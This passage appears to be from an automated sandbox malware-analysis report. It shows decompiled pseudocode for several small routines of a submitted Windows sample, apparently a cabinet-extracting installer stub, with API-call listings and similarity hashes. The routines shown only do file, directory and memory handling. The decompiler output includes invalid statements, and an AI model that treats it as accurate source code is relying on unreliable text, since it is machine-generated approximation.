                                                                                                                                                                                                                                            					E00A4490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a44880
                                                                                                                                                                                                                                            0x00a4488c
                                                                                                                                                                                                                                            0x00a44894
                                                                                                                                                                                                                                            0x00a448a0
                                                                                                                                                                                                                                            0x00a448c9
                                                                                                                                                                                                                                            0x00a448ce
                                                                                                                                                                                                                                            0x00a448a2
                                                                                                                                                                                                                                            0x00a448a8
                                                                                                                                                                                                                                            0x00a448b7
                                                                                                                                                                                                                                            0x00a448bc
                                                                                                                                                                                                                                            0x00a448aa
                                                                                                                                                                                                                                            0x00a448ac
                                                                                                                                                                                                                                            0x00a448ac
                                                                                                                                                                                                                                            0x00a448a8
                                                                                                                                                                                                                                            0x00a448de
                                                                                                                                                                                                                                            0x00a448e7
                                                                                                                                                                                                                                            0x00a4490b
                                                                                                                                                                                                                                            0x00a448ee
                                                                                                                                                                                                                                            0x00a448f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A44A23,?,00A44F67,*MEMCAB,00008000,00000180), ref: 00A448DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A44F67,*MEMCAB,00008000,00000180), ref: 00A44902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: f852d3ed4d365f2fc59bcb78482b8cd22d333de780742c365c0179b4a3e6d5e3
                                                                                                                                                                                                                                            • Instruction ID: 24f42b8dcbde62288e7ee69becc3bae6400bbd50952107d828ced6d6d7af3d18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f852d3ed4d365f2fc59bcb78482b8cd22d333de780742c365c0179b4a3e6d5e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16016DABE5697026F32481694C88FB7555CCBDA735F1B0334BDEAE71D2D6644C0491E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A44AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0xa4858c; // 0x268
                                                                                                                                                                                                                                            				_t9 = E00A43680(_t20);
                                                                                                                                                                                                                                            				if( *0xa491d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0xa48d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0xa49400; // 0xc7800
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0xa49400 = _t15;
                                                                                                                                                                                                                                            							if( *0xa48184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa493f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a44ad5
                                                                                                                                                                                                                                            0x00a44adb
                                                                                                                                                                                                                                            0x00a44ae7
                                                                                                                                                                                                                                            0x00a44aee
                                                                                                                                                                                                                                            0x00a44b05
                                                                                                                                                                                                                                            0x00a44b0d
                                                                                                                                                                                                                                            0x00a44b14
                                                                                                                                                                                                                                            0x00a44b1a
                                                                                                                                                                                                                                            0x00a44b1c
                                                                                                                                                                                                                                            0x00a44b21
                                                                                                                                                                                                                                            0x00a44b2a
                                                                                                                                                                                                                                            0x00a44b2f
                                                                                                                                                                                                                                            0x00a44b31
                                                                                                                                                                                                                                            0x00a44b39
                                                                                                                                                                                                                                            0x00a44b54
                                                                                                                                                                                                                                            0x00a44b54
                                                                                                                                                                                                                                            0x00a44b39
                                                                                                                                                                                                                                            0x00a44b2f
                                                                                                                                                                                                                                            0x00a44b0f
                                                                                                                                                                                                                                            0x00a44b0f
                                                                                                                                                                                                                                            0x00a44b0f
                                                                                                                                                                                                                                            0x00a44b5e
                                                                                                                                                                                                                                            0x00a44ae9
                                                                                                                                                                                                                                            0x00a44aed
                                                                                                                                                                                                                                            0x00a44aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A4369F
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436B2
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A44B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 4eca0a5de7621436c9bb09cb5485ea05d95532f6f1121b5ff437a85fda5ec39a
                                                                                                                                                                                                                                            • Instruction ID: 6a8dd62eb3369647295344a3a7e3bd0dbd94473a5412385336496dd6f83f5d76
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4eca0a5de7621436c9bb09cb5485ea05d95532f6f1121b5ff437a85fda5ec39a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401403D241205ABDB14CF98EC05BA77769E7C9729F148225F939971E0CB72D823CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A4658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0xa48b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0xa48b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E00A416B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a46592
                                                                                                                                                                                                                                            0x00a46594
                                                                                                                                                                                                                                            0x00a46596
                                                                                                                                                                                                                                            0x00a46598
                                                                                                                                                                                                                                            0x00a46598
                                                                                                                                                                                                                                            0x00a4659b
                                                                                                                                                                                                                                            0x00a4659b
                                                                                                                                                                                                                                            0x00a4659d
                                                                                                                                                                                                                                            0x00a4659e
                                                                                                                                                                                                                                            0x00a465a2
                                                                                                                                                                                                                                            0x00a465a4
                                                                                                                                                                                                                                            0x00a465a9
                                                                                                                                                                                                                                            0x00a465b2
                                                                                                                                                                                                                                            0x00a465b6
                                                                                                                                                                                                                                            0x00a465ba
                                                                                                                                                                                                                                            0x00a465c3
                                                                                                                                                                                                                                            0x00a465c5
                                                                                                                                                                                                                                            0x00a465c8
                                                                                                                                                                                                                                            0x00a465c8
                                                                                                                                                                                                                                            0x00a465c3
                                                                                                                                                                                                                                            0x00a465c9
                                                                                                                                                                                                                                            0x00a465cc
                                                                                                                                                                                                                                            0x00a465d2
                                                                                                                                                                                                                                            0x00a465d1
                                                                                                                                                                                                                                            0x00a465d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a465dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A48B3E,00A48B3F,00000001,00A48B3E,-00000003,?,00A460EC,00A41140,?), ref: 00A465BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 6dbf4d442b0d1c6cb501ad7d74094e14b36118780ebda9296bf529ab53fbb398
                                                                                                                                                                                                                                            • Instruction ID: 0a0f3ae5298ea4bb3cba7f328fd41e778e12c53e8accae80df703b75d68f42af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dbf4d442b0d1c6cb501ad7d74094e14b36118780ebda9296bf529ab53fbb398
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38F04C3A1042509BD3315E1D9884B67BFDE9BC7350F28016EE8DAC3205CA658C4683A3
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A4621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A4597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a46229
                                                                                                                                                                                                                                            0x00a46230
                                                                                                                                                                                                                                            0x00a46247
                                                                                                                                                                                                                                            0x00a4626a
                                                                                                                                                                                                                                            0x00a46272
                                                                                                                                                                                                                                            0x00a46249
                                                                                                                                                                                                                                            0x00a46255
                                                                                                                                                                                                                                            0x00a4625f
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46264
                                                                                                                                                                                                                                            0x00a46284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A4623F
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 5fdf7aedb1952bf290419f165bc22fbb7f6d5e39308fbaa01e9972bacc1865db
                                                                                                                                                                                                                                            • Instruction ID: b23c72af148346e13eeff2f7f6fd6fe8e92453e1238a1f16fdf8256cd36b2f07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fdf7aedb1952bf290419f165bc22fbb7f6d5e39308fbaa01e9972bacc1865db
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0E9B8B00208BBD750EBB49E02FFF33BCDBD5300F40006AB986D6082DEB59D458651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa48d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa48d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa48d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a44b66
                                                                                                                                                                                                                                            0x00a44b74
                                                                                                                                                                                                                                            0x00a44b98
                                                                                                                                                                                                                                            0x00a44ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44bac
                                                                                                                                                                                                                                            0x00a44ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44ba4
                                                                                                                                                                                                                                            0x00a44b78
                                                                                                                                                                                                                                            0x00a44b7e
                                                                                                                                                                                                                                            0x00a44b84
                                                                                                                                                                                                                                            0x00a44b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A44FA1,00000000), ref: 00A44B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: f6b9c8af8d03ad5ea062f8992a6f5a7361d34ff098fdd9fae98a6142b9c6d4e7
                                                                                                                                                                                                                                            • Instruction ID: 917d19439405a7fccc52a758e6adafac39f0e03f1bd6f5e2b6af3b0940efdc7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6b9c8af8d03ad5ea062f8992a6f5a7361d34ff098fdd9fae98a6142b9c6d4e7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF01239D41B089E9B71DF79EC00656BBE4EAE5360310092E946EE2190DB74A442DB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A466AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a466b1
                                                                                                                                                                                                                                            0x00a466ba
                                                                                                                                                                                                                                            0x00a466c7
                                                                                                                                                                                                                                            0x00a466bc
                                                                                                                                                                                                                                            0x00a466be
                                                                                                                                                                                                                                            0x00a466be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A44777,?,00A44E38,?), ref: 00A466B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: c775fc15ddd7026894e0f587e11b963e527030dda54bd4ab264c1f3091c0c1ea
                                                                                                                                                                                                                                            • Instruction ID: 17831a0eb4a929b012183fed9a40d22d312bda9682cdfcc620b164585b0459ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c775fc15ddd7026894e0f587e11b963e527030dda54bd4ab264c1f3091c0c1ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79B0927E262450426A2447B16C295562941A6D263B7E51B94F032C01E0CA3EC846D005
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a44caa
                                                                                                                                                                                                                                            0x00a44cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A44CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 475ca8363c9863bcdf75b2988461c13a7917b46a1065668218ed99b1f6ff8fe2
                                                                                                                                                                                                                                            • Instruction ID: 1f8cd68ca1780d77173fa8408a7012a6d70bcf3868f92546a5651efbf26bbf80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 475ca8363c9863bcdf75b2988461c13a7917b46a1065668218ed99b1f6ff8fe2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3B0123A08420CB7DF001FC2EC09F853F1DE7C5761F140000F60C454508A73941186A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a44cc8
                                                                                                                                                                                                                                            0x00a44ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: e831385df98155339262e75e3bd869aa9605f55ac713bd4f6e10f618208c65ff
                                                                                                                                                                                                                                            • Instruction ID: 531caf0a64486b1d07e5e84c77be840cc98d5e704836c6ec02f0a36561ca7c60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e831385df98155339262e75e3bd869aa9605f55ac713bd4f6e10f618208c65ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72B0123504010CB78F001B82EC088453F1DD6C12607000010F50C414218B3398128585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

